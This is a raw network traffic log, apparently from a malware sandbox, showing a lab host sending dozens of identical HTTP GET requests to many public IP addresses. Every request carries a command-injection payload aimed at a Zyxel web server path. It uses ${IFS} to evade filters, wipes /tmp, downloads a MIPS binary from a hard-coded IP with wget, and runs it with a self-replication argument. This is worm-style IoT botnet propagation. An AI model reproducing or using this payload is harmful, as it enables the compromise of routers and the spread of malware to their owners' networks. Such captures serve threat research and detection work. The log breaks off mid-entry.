                                              Jan 29, 2024 07:03:57.150063992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6087192.168.2.144059614.2.157.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150101900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6088192.168.2.1457628175.226.180.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150150061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6089192.168.2.1443742223.65.59.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150180101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6090192.168.2.1459314203.174.178.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150207996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6091192.168.2.1441688179.92.96.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150247097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6092192.168.2.1447112121.154.208.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150270939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6093192.168.2.1439352170.116.194.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150305033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6094192.168.2.1447774203.58.105.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150341034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6095192.168.2.1452788160.67.53.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150368929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6096192.168.2.1451648105.164.232.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150417089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6097192.168.2.1450310150.237.252.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150446892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6098192.168.2.1450158184.72.69.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150484085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6099192.168.2.1449684135.133.79.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150593996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6100192.168.2.1438032190.90.25.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150640965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6101192.168.2.145900671.37.8.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150664091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6102192.168.2.1452164119.98.111.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150691986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6103192.168.2.143620273.168.110.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150718927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6104192.168.2.1442814194.214.218.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150749922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6105192.168.2.1439104142.1.67.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150809050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6106192.168.2.145829668.14.167.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150851965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6107192.168.2.143419070.67.185.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150887012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6108192.168.2.1435768217.131.220.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150911093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6109192.168.2.144349253.245.167.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150959015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6110192.168.2.1449990211.121.213.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150993109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6111192.168.2.145542893.225.104.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151038885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6112192.168.2.143860024.86.193.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151078939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6113192.168.2.14334088.186.221.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151117086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6114192.168.2.144683217.167.55.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151144981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6115192.168.2.145004264.171.133.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151181936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6116192.168.2.145198297.38.34.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151206017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6117192.168.2.14446981.32.255.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151252031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6118192.168.2.1441422222.198.10.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151294947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6119192.168.2.1452666223.215.202.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151345968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6120192.168.2.145004446.145.168.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151376963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6121192.168.2.1440546184.61.186.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151418924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6122192.168.2.1441562134.103.237.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151453018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6123192.168.2.144644225.67.161.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151511908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6124192.168.2.1452726177.197.45.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151530027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6125192.168.2.1435384193.93.148.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151568890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6126192.168.2.1435762170.221.226.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151622057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6127192.168.2.1441508144.92.133.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151658058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6128192.168.2.145720624.17.92.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151691914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6129192.168.2.145364866.239.99.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151729107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6130192.168.2.145516844.193.233.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151762962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6131192.168.2.1452740184.97.36.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151796103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6132192.168.2.1437672206.161.106.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151851892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6133192.168.2.144989247.209.168.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151887894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6134192.168.2.145059277.136.23.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151915073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6135192.168.2.143440849.166.6.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.151947975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6136192.168.2.1445572147.32.27.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152002096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6137192.168.2.1444038113.12.145.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152041912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6138192.168.2.1444490172.243.105.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152085066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6139192.168.2.1458406203.152.206.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152106047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6140192.168.2.1448518180.101.53.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152157068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6141192.168.2.1457264109.200.118.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152179003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6142192.168.2.1434960102.8.182.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152220011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6143192.168.2.144029424.211.105.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152267933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6144192.168.2.143936869.87.171.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152296066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6145192.168.2.1438972128.219.188.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152339935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6146192.168.2.1454158219.93.45.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152381897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6147192.168.2.1441240156.168.175.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152410030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6148192.168.2.1459994126.252.178.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152458906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6149192.168.2.1452464204.72.219.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152488947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6150192.168.2.1443028156.212.153.216443
                                              TimestampBytes transferredDirectionData
